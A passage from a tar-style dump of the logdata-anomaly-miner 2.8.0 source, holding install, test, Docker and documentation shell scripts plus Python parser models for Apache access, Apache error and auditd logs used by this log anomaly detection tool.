/dev/null if [ $? -ne 0 ] then echo "Please install and configure sudo first" exit 1 fi if [ -e /etc/debian_version ]; then sudo /usr/bin/apt-get update sudo DEBIAN_FRONTEND=nointeractive /usr/bin/apt-get install -y -q ansible git elif [ -e /etc/fedora-release ] || [ -e /etc/redhat-release ]; then sudo dnf install -y ansible git else echo "Currently only Debian and Fedora based distributions are supported." echo "More specifically this includes Debian Buster, Debian Bullseye, Debian Bookworm, Ubuntu 20, Ubuntu 22, Ubuntu 24, Fedora, and RedHat." echo "If you decide to install the AMiner on another system, please add **--extra-vars \"ansible_distribution == '$DIST' ansible_distribution_major_version == '$VER'\"**." echo "Choose the best-fitting related distribution of the supported ones for $DIST and $VER." exit 1 fi if [ "$AMINERSRC" = "0" ] then git clone -b $BRANCH $URL $AMINERDST else if [ $DISON -eq 1 ] then cp -rap $AMINERSRC $AMINERDST else AMINERDST=$AMINERSRC fi fi cd $AMINERDST test -d roles || mkdir roles git clone -b $BRANCH https://github.com/ait-aecid/aminer-ansible roles/aminer cat > playbook.yml << EOF - hosts: localhost vars: aminer_gitrepo: False # We assume that we cloned the aminer to /home/developer/aminer aminer_repopath: "${AMINERDST}" roles: - aminer EOF # Use this command to deploy the aminer-files # You can add your changes in the aminer-directory # and repeatedly execute this command to deploy # your changes sudo ansible-playbook playbook.yml if [ $DELDIR -eq 1 ] then test -d $AMINERDST && rm -rf $AMINERDST fi exit 0 logdata-anomaly-miner-2.8.0/scripts/aminerwrapper.sh000077500000000000000000000012451500476301700226110ustar00rootroot00000000000000#!/bin/bash AMINERDIR=/usr/lib/logdata-anomaly-miner program=$(basename $0) if [ "$program" == "aminerwrapper.sh" ]; then program=$(basename $1) fi case "$program" in aminer) $AMINERDIR/.venv/bin/python3 $AMINERDIR/aminer.py "${@:1}" ;; aminerremotecontrol) $AMINERDIR/.venv/bin/python3 $AMINERDIR/aminerremotecontrol.py "${@:1}" ;; aminer-persistence) $AMINERDIR/.venv/bin/python3 $AMINERDIR/aminer-persistence.py "${@:1}" ;; supervisor) /usr/bin/supervisord ;; mkdocs) cd /docs make html ;; *) echo "Usage: [ aminer | aminerremotecontrol | aminer-persistence | supervisor | mkdocs ] " echo "$program" exit 1 ;; esac exit 0 logdata-anomaly-miner-2.8.0/scripts/build_docker.sh000077500000000000000000000004531500476301700223630ustar00rootroot00000000000000#!/bin/bash CONTAINER="docker" test $CONTAINER_PROG && CONTAINER=$CONTAINER_PROG scripts/addbuildid.sh $CONTAINER build -t aecid/logdata-anomaly-miner:latest -t aecid/logdata-anomaly-miner:$(grep '__version__ =' source/root/usr/lib/logdata-anomaly-miner/metadata.py | awk -F '"' '{print $2}') . logdata-anomaly-miner-2.8.0/scripts/create_aminerremotecontrol_wiki.sh000077500000000000000000000124331500476301700263740ustar00rootroot00000000000000#!/bin/bash cd /usr/share/man/man1/ sudo xsltproc --output /usr/share/man/man1/aminerremotecontrol.1 -''-nonet -''-param man.charmap.use.subset "0" -''-param make.year.ranges "1" -''-param make.single.year.ranges "1" /usr/share/xml/docbook/stylesheet/docbook-xsl/manpages/docbook.xsl /home/user/Documents/Git_projects/logdata-anomaly-miner/docs/manpages/aminerremotecontrol.1.xml && sudo gzip /usr/share/man/man1/aminerremotecontrol.1 sudo gunzip /usr/share/man/man1/aminerremotecontrol.1.gz sudo cp /usr/share/man/man1/aminerremotecontrol.1 /tmp sudo chown user:user /tmp/aminerremotecontrol.1 sudo apt install pandoc pandoc --from man --to gfm /tmp/aminerremotecontrol.1 -o /tmp/aminerremotecontrol.md # man-to-github-flawored-markdown # quotes are not successfully recreated from the parser.. sed -i $'s/,property\\\_name/,\'property\\\_name\'/g' /tmp/aminerremotecontrol.md sed -i $'s/,attribute/,\'attribute\'/g' /tmp/aminerremotecontrol.md sed -i $'s/NewMatchPath,/\'NewMatchPath\',/g' /tmp/aminerremotecontrol.md sed -i $'s/NewMatchPathDet)/\'NewMatchPathDet\')/g' /tmp/aminerremotecontrol.md sed -i $'s/auto\\\_include\\\_flag,/\'auto\\\_include\\\_flag\',/g' /tmp/aminerremotecontrol.md sed -i $'s/auto\\\_include\\\_flag)/\'auto\\\_include\\\_flag\')/g' /tmp/aminerremotecontrol.md sed -i $'s/,old\\\_component\\\_name,/,\'old\\\_component\\\_name\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,new\\\_component\\\_name/,\'new\\\_component\\\_name\'/g' /tmp/aminerremotecontrol.md sed -i $'s/,history\\\_component\\\_name/,\'history\\\_component\\\_name\'/g' /tmp/aminerremotecontrol.md sed -i $'s/NewMatchPathDetector/\'NewMatchPathDetector\'/g' /tmp/aminerremotecontrol.md sed -i $'s/\*\'NewMatchPathDetector\'\*/\*NewMatchPathDetector\*/g' /tmp/aminerremotecontrol.md sed -i $'s/,component\\\_name/,\'component\\\_name\'/g' /tmp/aminerremotecontrol.md sed -i $'s/AtomFilter/,\'AtomFilter\'/g' /tmp/aminerremotecontrol.md sed -i $'s/LogResourceList/\'LogResourceList\'/g' /tmp/aminerremotecontrol.md sed -i $'s/,atom\\\_handler,/,\'atom\\\_handler\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,destination\\\_file/,\'destination\\\_file\'/g' /tmp/aminerremotecontrol.md sed -i $'s,/tmp/config.py,\'/tmp/config.py\',g' /tmp/aminerremotecontrol.md sed -i $'s/,EnhancedNewMatchPathValueComboDetector,/,\'EnhancedNewMatchPathValueComboDetector\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,MissingMatchPathValueDetector,/,\'MissingMatchPathValueDetector\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,NewMatchPathValueComboDetector,/,\'NewMatchPathValueComboDetector\',/g' /tmp/aminerremotecontrol.md sed -i $'s,new/path,\'new/path\',g' /tmp/aminerremotecontrol.md sed -i $'s/,VolatileLogarithmicBackoffEventHistory,/,\'VolatileLogarithmicBackoffEventHistory\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,MailAlerting.TargetAddress,/,\'MailAlerting.TargetAddress\',/g' /tmp/aminerremotecontrol.md sed -i $'s/root@localhost/\'root@localhost\'/g' /tmp/aminerremotecontrol.md sed -i $'s/,MailAlerting.FromAddress,/,\'MailAlerting.FromAddress\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,MailAlerting.SubjectPrefix,/,\'MailAlerting.SubjectPrefix\',/g' /tmp/aminerremotecontrol.md sed -i $'s/aminer Alerts:)/\'aminer Alerts:\')/g' /tmp/aminerremotecontrol.md sed -i $'s/,MailAlerting.EventCollectTime,/,\'MailAlerting.EventCollectTime\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,MailAlerting.MinAlertGap,/,\'MailAlerting.MinAlertGap\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,MailAlerting.MaxAlertGap,/,\'MailAlerting.MaxAlertGap\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,MailAlerting.MaxEventsPerMessage,/,\'MailAlerting.MaxEventsPerMessage\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,LogPrefix,/,\'LogPrefix\',/g' /tmp/aminerremotecontrol.md sed -i $'s/Original log/\'Original log/g' /tmp/aminerremotecontrol.md sed -i $'s/line: /line: \'/g' /tmp/aminerremotecontrol.md sed -i $'s/This defaults to ./This defaults to \'\'./g' /tmp/aminerremotecontrol.md sed -i $'s/,Resources.MaxMemoryUsage,/,\'Resources.MaxMemoryUsage\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,Core.PersistencePeriod,/,\'Core.PersistencePeriod\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,Log.StatisticsLevel,/,\'Log.StatisticsLevel\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,Log.DebugLevel,/,\'Log.DebugLevel\',/g' /tmp/aminerremotecontrol.md sed -i $'s/,Log.StatisticsPeriod,/,\'Log.StatisticsPeriod\',/g' /tmp/aminerremotecontrol.md sed -i $'s/\*\*\*socket/\*\* \*socket/g' /tmp/aminerremotecontrol.md sed -i $'s/\*\*\*command/\*\* \*command/g' /tmp/aminerremotecontrol.md sed -i $'s/\*\*\*file/\*\* \*file/g' /tmp/aminerremotecontrol.md sed -i $'s/\*\*\*data/\*\* \*data/g' /tmp/aminerremotecontrol.md sed -i $'s/command\*\*\*/command\* \*\*/g' /tmp/aminerremotecontrol.md sed -i $'s/file\*\*\*/file\* \*\*/g' /tmp/aminerremotecontrol.md sed -i $'s/^\*\*$//g' /tmp/aminerremotecontrol.md sed -i $'s/^\*\* \*\*\*/\*\*\*/g' /tmp/aminerremotecontrol.md sed -i $'s/\*\*\* \*\*/\*\*\*/g' /tmp/aminerremotecontrol.md sed -i $'s/\*\*\*/\*\*/g' /tmp/aminerremotecontrol.md sed -i ':a;N;$!ba;s/\*\*aminerremotecontrol\*\* \\\[\*\*\\\[--exec \*\* \*command\* \*\*\\] | \\\[--exec-file\n\*\* \*file\* \*\*\\]\*\*\\] \*\*\\\[OPTIONS\\]...\*\*/\*\*aminerremotecontrol\*\* \\\[\*\*\\\[--exec \*\* \*command\* \*\*\\] | \\\[--exec-file\*\* \*file\* \*\*\\]\*\*\\] \*\*\\\[OPTIONS\\]...\*\*/g' /tmp/aminerremotecontrol.md logdata-anomaly-miner-2.8.0/scripts/deploydocs.sh000077500000000000000000000012441500476301700221010ustar00rootroot00000000000000#!/usr/bin/bash BRANCH=$1 SOURCE=$2 DEST=$3 case $BRANCH in development) test -d $DEST/development && rm -rf $DEST/development cp -r $SOURCE $DEST/development ;; main) VERSION=$(grep '__version__ =' source/root/usr/lib/logdata-anomaly-miner/metadata.py | awk -F '"' '{print $2}') if [ $(echo $VERSION | grep -P "\d+\.\d+\.\d+") ] then test -d $DEST/$VERSION && rm -rf $DEST/$VERSION cp -r $SOURCE $DEST/$VERSION test -e $DEST/current && unlink $DEST/current ln -s $DEST/$VERSION $DEST/current else echo "Unable to identify the aminer-version!" exit 1 fi ;; *) echo "usage: $0 main|development" exit 1 ;; esac exit 0 logdata-anomaly-miner-2.8.0/scripts/distritest.sh000077500000000000000000000006311500476301700221310ustar00rootroot00000000000000#!/bin/bash sudo sed -i '/imklog/s/^/#/' /etc/rsyslog.conf sudo rsyslogd echo "ServerName localhost" | sudo tee -a /etc/apache2/apache2.conf > /dev/null sudo service apache2 start curl localhost curl -XPOST localhost curl -I localhost sudo chown aminer:aminer /var/lib/aminer sudo chmod 700 /var/lib/aminer sudo timeout --preserve-status 20s aminer -o --config /home/aminer/gettingStarted-config.yml exit $? logdata-anomaly-miner-2.8.0/scripts/prep-docker-compose.sh000077500000000000000000000015471500476301700236200ustar00rootroot00000000000000#!/bin/bash test -d aminercfg || mkdir aminercfg test -d persistency || mkdir persistency test -d persistency/log || mkdir persistency/log test -d logs || mkdir logs test -d akafka || mkdir akafka test -e aminercfg/config.yml || cp -r source/root/etc/aminer/template_config.yml aminercfg/config.yml test -d aminercfg/conf-enabled || mkdir aminercfg/conf-enabled test -e aminercfg/conf-enabled/ApacheAccessModel.py || cp source/root/etc/aminer/conf-available/generic/ApacheAccessModel.py aminercfg/conf-enabled/ApacheAccessModel.py sed -i "s+# - 'unix+ - 'unix+g" aminercfg/config.yml sed -i "s+ - 'file:///var/log/apache2/access.log'+# - 'file:///logs/access.log'+g" aminercfg/config.yml sed -i "s+# RemoteControlSocket: '/var/lib/aminer/log/remcontrol.sock'+RemoteControlSocket: '/var/lib/aminer/log/remcontrol.sock'+g" aminercfg/config.yml logdata-anomaly-miner-2.8.0/scripts/supervisord.conf000066400000000000000000000003701500476301700226300ustar00rootroot00000000000000[supervisord] nodaemon=true pidfile=/var/lib/supervisor/supervisor.pid [unix_http_server] file=/var/lib/supervisor/supervisor.sock [include] files = /etc/supervisor/conf.d/*.conf [program:aminer] command=/usr/lib/logdata-anomaly-miner/aminer.py logdata-anomaly-miner-2.8.0/scripts/testingwrapper.sh000077500000000000000000000076761500476301700230310ustar00rootroot00000000000000#!/bin/bash TESTDIR=/home/aminer/logdata-anomaly-miner/aecid-testsuite if [ $# -gt 0 ] then sudo sed -i '/imklog/s/^/#/' /etc/rsyslog.conf sudo rsyslogd sudo service postfix start fi case "$1" in runSuspendModeTest) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runUnittests) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runAminerDemo) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runAminerJsonInputDemo) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runAminerXmlInputDemo) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runAminerIntegrationTest) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runCoverageTests) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runRemoteControlTest) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runGettingStarted) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runTryItOut) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runHowToCreateYourOwnSequenceDetector) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runHowToCreateYourOwnFrequencyDetector) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runHowToMissingMatchPathValueDetector) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runHowToEntropyDetector) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runJsonDemo) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runAminerEncodingDemo) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runOfflineMode) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runMypy) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runBandit) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runVulture) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runFlake8) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runMccabe) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runConfAvailableTest) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; runReleaseStringCheck) cd $TESTDIR ./${1}.sh ${*:2} exit $? ;; ALL) cd $TESTDIR ./runMypy.sh ./runBandit.sh ./runVulture.sh ./runFlake8.sh ./runMccabe.sh ./runReleaseStringCheck.sh ./runSuspendModeTest.sh ./runUnittests.sh ./runRemoteControlTest.sh ./runConfAvailableTest.sh ./runAminerDemo.sh demo/aminer/demo-config.py ./runAminerDemo.sh demo/aminer/jsonConverterHandler-demo-config.py ./runAminerDemo.sh demo/aminer/template_config.py ./runAminerDemo.sh demo/aminer/template_config.yml ./runAminerDemo.sh demo/aminer/demo-config.yml ./runAminerEncodingDemo.sh demo/aminer/demo-config.py ./runAminerEncodingDemo.sh demo/aminer/demo-config.yml ./runAminerJsonInputDemo.sh ./runAminerXmlInputDemo.sh ./runJsonDemo.sh demo/aminerJsonInputDemo/json-aminer-demo.yml ./runJsonDemo.sh demo/aminerJsonInputDemo/json-elastic-demo.yml ./runJsonDemo.sh demo/aminerJsonInputDemo/json-eve-demo.yml ./runJsonDemo.sh demo/aminerJsonInputDemo/json-journal-demo.yml ./runJsonDemo.sh demo/aminerJsonInputDemo/json-wazuh-demo.yml ./runAminerIntegrationTest.sh aminerIntegrationTest.sh config.py ./runAminerIntegrationTest.sh aminerIntegrationTest2.sh config21.py config22.py ./runOfflineMode.sh ./runGettingStarted.sh ./runTryItOut.sh ./runHowToCreateYourOwnSequenceDetector.sh ./runHowToCreateYourOwnFrequencyDetector.sh ./runHowToMissingMatchPathValueDetector.sh ./runHowToEntropyDetector.sh ./runCoverageTests.sh exit $? ;; SHELL) bash ${*:2} exit 0 ;; *) echo "Usage: [ ALL | SHELL | runSuspendModeTest | runUnittests | runAminerDemo | runJsonDemo | runAminerJsonInputDemo" echo " runAminerXmlInputDemo | runAminerIntegrationTest | runOfflineMode | runCoverageTests | runRemoteControlTest" echo " runTryItOut | runGettingStarted | runHowToCreateYourOwnSequenceDetector | runHowToCreateYourOwnFrequencyDetector" echo " runHowToMissingMatchPathValueDetector | runHowToEntropyDetector | runAminerEncodingDemo | runMypy | runBandit" echo " runVulture | runFlake8 | runMccabe | runConfAvailableTest | runReleaseStringCheck ] " exit 1 ;; esac exit 0 logdata-anomaly-miner-2.8.0/source/000077500000000000000000000000001500476301700172055ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/000077500000000000000000000000001500476301700201705ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/etc/000077500000000000000000000000001500476301700207435ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/etc/aminer/000077500000000000000000000000001500476301700222165ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/000077500000000000000000000000001500476301700250615ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/ait-lds/000077500000000000000000000000001500476301700264165ustar00rootroot00000000000000ApacheAccessParsingModel.py000066400000000000000000000064311500476301700335250ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/ait-lds"""This module defines a generated parser model.""" from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement def get_model(): """Return a model to parse Apache Access logs from the AIT-LDS.""" alphabet = b"!'#$%&\"()*+,-./0123456789:;<>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\^_`abcdefghijklmnopqrstuvwxyz{|}~=[]" model = SequenceModelElement("model", [ FirstMatchModelElement("client_ip", [ SequenceModelElement("client_ip", [ DelimitedDataModelElement("domain", b" "), FixedDataModelElement("sp0", b" "), IpAddressDataModelElement("client_ip") ]), SequenceModelElement("localhost", [ DelimitedDataModelElement("domain", b" "), FixedDataModelElement("sp0", b" "), FixedDataModelElement("localhost", b"::1") ]), IpAddressDataModelElement("client_ip"), FixedDataModelElement("localhost", b"::1") ]), FixedDataModelElement("sp1", b" "), VariableByteDataModelElement("client_id", alphabet), FixedDataModelElement("sp2", b" "), VariableByteDataModelElement("user_id", alphabet), FixedDataModelElement("sp3", b" ["), DateTimeModelElement("time", b"%d/%b/%Y:%H:%M:%S%z"), FixedDataModelElement("sp4", b'] "'), FirstMatchModelElement("fm", [ FixedDataModelElement("dash", b"-"), SequenceModelElement("request", [ FixedWordlistDataModelElement("method", [ b"GET", b"POST", b"PUT", b"HEAD", b"DELETE", b"CONNECT", b"OPTIONS", b"TRACE", b"PATCH", b"REPORT", b"PROPFIND", b"MKCOL"]), FixedDataModelElement("sp5", b" "), DelimitedDataModelElement("request", b" ", b"\\"), FixedDataModelElement("sp6", b" "), DelimitedDataModelElement("version", b'"'), ]) ]), FixedDataModelElement("sp7", b'" '), DecimalIntegerValueModelElement("status_code"), FixedDataModelElement("sp8", b" "), DecimalIntegerValueModelElement("content_size"), OptionalMatchModelElement( "combined", SequenceModelElement("combined", [ FixedDataModelElement("sp9", b' "'), DelimitedDataModelElement("referer", b'"', b"\\"), FixedDataModelElement("sp10", b'" "'), DelimitedDataModelElement("user_agent", b'"', b"\\"), FixedDataModelElement("sp11", b'"'), ])) ]) return model logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/ait-lds/ApacheErrorParsingModel.py000066400000000000000000000204111500476301700334660ustar00rootroot00000000000000"""This module defines a generated parser model.""" from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement def get_model(): """Return a model to parse Apache Error logs from the AIT-LDS.""" model = FirstMatchModelElement("model", [ FixedDataModelElement("mkdir_failed", b"mkdir failed on directory /var/run/samba/msg.lock: Permission denied"), SequenceModelElement("with_data", [ FixedDataModelElement("sp1", b"["), FixedWordlistDataModelElement("day", [b"Mon", b"Tue", b"Wed", b"Thu", b"Fri", b"Sat", b"Sun"]), FixedDataModelElement("sp2", b" "), DateTimeModelElement("time", b"%b %d %H:%M:%S.%f %Y"), FixedDataModelElement("bracket_str", b"] ["), DelimitedDataModelElement("source", b"]"), FixedDataModelElement("pid_str", b"] [pid "), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("bracket_str", b"] "), FirstMatchModelElement("fm", [ SequenceModelElement("client", [ FixedDataModelElement("client_str", b"[client "), IpAddressDataModelElement("client_ip"), FixedDataModelElement("colon", b":"), DecimalIntegerValueModelElement("client_port"), FirstMatchModelElement("fm", [ SequenceModelElement("php", [ FixedDataModelElement("php", b"] PHP "), FirstMatchModelElement("fphp", [ SequenceModelElement("warning", [ FixedDataModelElement("warning_str", b"Warning: "), FirstMatchModelElement("warning", [ SequenceModelElement("declaration", [ FixedDataModelElement("declaration_str", b"Declaration of "), DelimitedDataModelElement("function", b")"), FixedDataModelElement("compatible_str", b") should be compatible with "), DelimitedDataModelElement("function2", b")"), FixedDataModelElement("compatible_str", b") in "), DelimitedDataModelElement("path", b" "), FixedDataModelElement("compatible_str", b" on line "), DecimalIntegerValueModelElement("line"), FixedDataModelElement("referer_str", b", referer: "), AnyByteDataModelElement("referer")]), SequenceModelElement("system", [ FixedDataModelElement("system_str", b"system(): Cannot execute a blank command in "), DelimitedDataModelElement("path", b" "), FixedDataModelElement("compatible_str", b" on line "), DecimalIntegerValueModelElement("line")]), AnyByteDataModelElement("warning_msg") ])]), SequenceModelElement("notice", [ FixedDataModelElement("notice_str", b"Notice: Undefined index: "), DelimitedDataModelElement("command", b" "), FixedDataModelElement("sp", b" in "), DelimitedDataModelElement("path", b" "), FixedDataModelElement("compatible_str", b" on line "), DecimalIntegerValueModelElement("line")]), SequenceModelElement("deprecated", [ FixedDataModelElement("deprecated_str", b"Deprecated: Methods with the same name as their class " b"will not be constructors in a future version of PHP; "), DelimitedDataModelElement("class", b" "), FixedDataModelElement("constructor_str", b" has a deprecated constructor in "), DelimitedDataModelElement("path", b" "), FixedDataModelElement("compatible_str", b" on line "), DecimalIntegerValueModelElement("line"), OptionalMatchModelElement("opt", SequenceModelElement("referer", [ FixedDataModelElement("referer_str", b", referer: "), AnyByteDataModelElement("referer") ])) ]), SequenceModelElement("fatal", [ FixedDataModelElement("fatal_str", b"Fatal error: "), AnyByteDataModelElement("error_msg") ]) ]) ]), SequenceModelElement("ah", [ FixedDataModelElement("ah_str", b"] AH"), DecimalIntegerValueModelElement("ah_number", value_pad_type=DecimalIntegerValueModelElement.PAD_TYPE_ZERO), FixedDataModelElement("colon", b": "), AnyByteDataModelElement("msg") ]), SequenceModelElement("script", [ FixedDataModelElement("script_str", b"] script '"), DelimitedDataModelElement("script_path", b"'"), FixedDataModelElement("msg", b"' not found or unable to stat"), OptionalMatchModelElement("referer", SequenceModelElement("referer", [ FixedDataModelElement("referer_str", b", referer: "), AnyByteDataModelElement("referer") ])) ]) ]), ]), SequenceModelElement("notice", [ FixedDataModelElement("ah_str", b"AH"), DecimalIntegerValueModelElement("ah_number", value_pad_type=DecimalIntegerValueModelElement.PAD_TYPE_ZERO), FixedDataModelElement("colon", b": "), AnyByteDataModelElement("msg") ]), SequenceModelElement("end_of_file", [ FixedDataModelElement("end_of_file_str", b"(70014)End of file found: [client "), IpAddressDataModelElement("client_ip"), FixedDataModelElement("colon", b":"), DecimalIntegerValueModelElement("port"), FixedDataModelElement("error_msg", b"] AH01102: error reading status line from remote server "), DelimitedDataModelElement("domain", b":"), FixedDataModelElement("colon", b":"), DecimalIntegerValueModelElement("remote_port") ]) ]) ]), SequenceModelElement("bash", [ FixedDataModelElement("bash", b"bash: "), AnyByteDataModelElement("error_msg") ]) ]) return model logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/ait-lds/AuditdParsingModel.py000066400000000000000000000531151500476301700325140ustar00rootroot00000000000000"""This module defines a generated parser model.""" from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement def get_model(): """Return a model to parse Audit logs from the AIT-LDS.""" alphabet = b"!'#$%&\"()*+,-./0123456789:;<>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\^_`abcdefghijklmnopqrstuvwxyz{|}~=[]" seq = [ FixedDataModelElement("audit_str", b"audit("), DateTimeModelElement("time", b"%s.%f"), FixedDataModelElement("colon_str", b":"), DecimalIntegerValueModelElement("id"), FixedDataModelElement("pid_str", b"): pid="), VariableByteDataModelElement("pid", alphabet), FixedDataModelElement("uid_str", b" uid="), VariableByteDataModelElement("uid", alphabet), FixedDataModelElement("auid_str", b" auid="), VariableByteDataModelElement("auid", alphabet), FixedDataModelElement("ses_str", b" ses="), VariableByteDataModelElement("ses", alphabet), FixedDataModelElement("msg2_str", b" msg="), VariableByteDataModelElement("msg2", alphabet), FirstMatchModelElement("fm", [ SequenceModelElement("acct", [ FixedDataModelElement("acct_str", b" acct="), VariableByteDataModelElement("acct", alphabet)]), SequenceModelElement("comm", [ FixedDataModelElement("comm_str", b" comm="), VariableByteDataModelElement("comm", alphabet)]), SequenceModelElement("id", [ FixedDataModelElement("id_str", b" id="), VariableByteDataModelElement("id", alphabet)]), SequenceModelElement("cmd", [ FixedDataModelElement("cmd_str", b" cmd="), VariableByteDataModelElement("cmd", alphabet)])]), OptionalMatchModelElement( "opt", SequenceModelElement("opt_seq", [ FixedDataModelElement("exe_str", b" exe="), VariableByteDataModelElement("exe", alphabet), FixedDataModelElement("hostname_str", b" hostname="), VariableByteDataModelElement("hostname", alphabet), FixedDataModelElement("addr_str", b" addr="), VariableByteDataModelElement("addr", alphabet)])), FixedDataModelElement("terminal_str", b" terminal="), VariableByteDataModelElement("terminal", alphabet), FixedDataModelElement("res_str", b" res="), VariableByteDataModelElement("res", alphabet)] model = SequenceModelElement("model", [ FixedDataModelElement("type_str", b"type="), FirstMatchModelElement("type", [ SequenceModelElement("execve", [ FixedDataModelElement("execve_str", b"EXECVE msg=audit("), DateTimeModelElement("time", b"%s.%f"), FixedDataModelElement("colon_str", b":"), DecimalIntegerValueModelElement("id"), FixedDataModelElement("argc_str", b"): argc="), DecimalIntegerValueModelElement("argc", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL), FixedDataModelElement("a0_str", b" a0="), VariableByteDataModelElement("a0", alphabet), OptionalMatchModelElement( "opt1", SequenceModelElement("seq1", [ FixedDataModelElement("a1_str", b" a1="), VariableByteDataModelElement("a1", alphabet), OptionalMatchModelElement( "opt2", SequenceModelElement("seq2", [ FixedDataModelElement("a2_str", b" a2="), VariableByteDataModelElement("a2", alphabet), OptionalMatchModelElement( "opt3", SequenceModelElement("seq3", [ FixedDataModelElement("a3_str", b" a3="), VariableByteDataModelElement("a3", alphabet), OptionalMatchModelElement( "opt4", SequenceModelElement("seq4", [ FixedDataModelElement("a4_str", b" a4="), VariableByteDataModelElement("a4", alphabet) ]) ), OptionalMatchModelElement( "opt5", SequenceModelElement("seq5", [ FixedDataModelElement("a5_str", b" a5="), VariableByteDataModelElement("a5", alphabet) ]) ), OptionalMatchModelElement( "opt6", SequenceModelElement("seq6", [ FixedDataModelElement("a6_str", b" a6="), VariableByteDataModelElement("a6", alphabet) ]) ), OptionalMatchModelElement( "opt7", SequenceModelElement("seq7", [ FixedDataModelElement("a7_str", b" a7="), VariableByteDataModelElement("a7", alphabet) ]) ), OptionalMatchModelElement( "opt8", SequenceModelElement("seq8", [ FixedDataModelElement("a8_str", b" a8="), VariableByteDataModelElement("a8", alphabet) ]) ), OptionalMatchModelElement( "opt9", SequenceModelElement("seq9", [ FixedDataModelElement("a9_str", b" a9="), VariableByteDataModelElement("a9", alphabet) ]) ), OptionalMatchModelElement( "opt10", SequenceModelElement("seq10", [ FixedDataModelElement("a10_str", b" a10="), VariableByteDataModelElement("a10", alphabet) ]) ), OptionalMatchModelElement( "opt11", SequenceModelElement("seq11", [ FixedDataModelElement("a11_str", b" a11="), VariableByteDataModelElement("a11", alphabet) ]) ), OptionalMatchModelElement( "opt12", SequenceModelElement("seq12", [ FixedDataModelElement("a12_str", b" a12="), VariableByteDataModelElement("a12", alphabet) ]) ), OptionalMatchModelElement( "opt13", SequenceModelElement("seq13", [ FixedDataModelElement("a13_str", b" a13="), VariableByteDataModelElement("a13", alphabet) ]) ), OptionalMatchModelElement( "opt14", SequenceModelElement("seq14", [ FixedDataModelElement("a14_str", b" a14="), VariableByteDataModelElement("a14", alphabet) ]) )]))]))]))]), SequenceModelElement("proctitle", [ FixedDataModelElement("type_str", b"PROCTITLE msg=audit("), DateTimeModelElement("time", b"%s.%f"), 